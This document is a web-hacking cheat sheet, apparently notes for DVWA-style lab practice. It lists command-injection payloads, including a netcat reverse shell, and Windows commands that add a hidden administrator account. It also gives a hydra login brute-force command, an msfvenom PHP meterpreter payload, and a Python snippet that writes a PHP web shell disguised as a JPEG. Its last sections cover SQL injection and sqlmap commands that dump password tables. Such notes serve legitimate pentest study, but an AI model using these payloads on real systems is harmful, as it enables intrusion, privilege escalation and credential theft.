# Hacking Web Applications and Web Servers

## Command Execution

### Linux

* `127.0.0.1 && ls`
* `127.0.0.1 & ls`
* `127.0.0.1 & ls`
* `127.0.0.1 ; ls`
* `127.0.0.1 | ls` - with space
* `127.0.0.1 |ls` - without space
* `127.0.0.1 && nc -c sh 127.0.0.1 9001`

### Windows

* `hostname`
* `whoami`
* `tasklist`
* `taskkill /PID 3112 /F` - forcefully kills the processes
* `dir c:\\`
* `net user`
* `net user test /add` - add a new user
* `net localgroup Administrators test /add` - add test user to administrators
* `net user test` - details of the user
* `dir c:\\”pin.txt”`
* `type c:\\”pin.txt”`

***

## Brute-Forcing

{% code overflow="wrap" %}

```bash
hydra -l admin -P /usr/share/wordlists/john.lst 'http-get-form://127.0.0.1:42001/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=7vs4mhc1q4dnp3f6cgikl01v9q; security=low:F=Username and/or password incorrect’
```

{% endcode %}

***

## File Upload

* `msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > exploit.php`
* `exploit.php.img`
* `GIf89a;` - add this line to any file to make it as image file
* `use multi/handler`

```python
# PHP reverse shell of type image/jpeg
fh = open('shell.php', 'wb')
fh.write(b'\\xFF\\xD8\\xFF\\xE0' + b'<? passthru($_GET["cmd"]); ?>')
fh.close()
```

***

## SQL Injection

### Manual

{% embed url="<https://book.hacktricks.xyz/pentesting-web/sql-injection>" %}

* `1’ UNION SELECT user, password FROM users#`

### Sqlmap

* `sqlmap -r req.txt --batch`
* `sqlmap -r req.txt --batch --level=5 --risk=3`
* `sqlmap -r req.txt --batch --level=5 --risk=3 --current-db`
* `sqlmap -r req.txt -D dvwa --tables`
* `sqlmap -r req.txt -D dvwa -T users --columns`
* `sqlmap -r req.txt -D dvwa -T users --dump`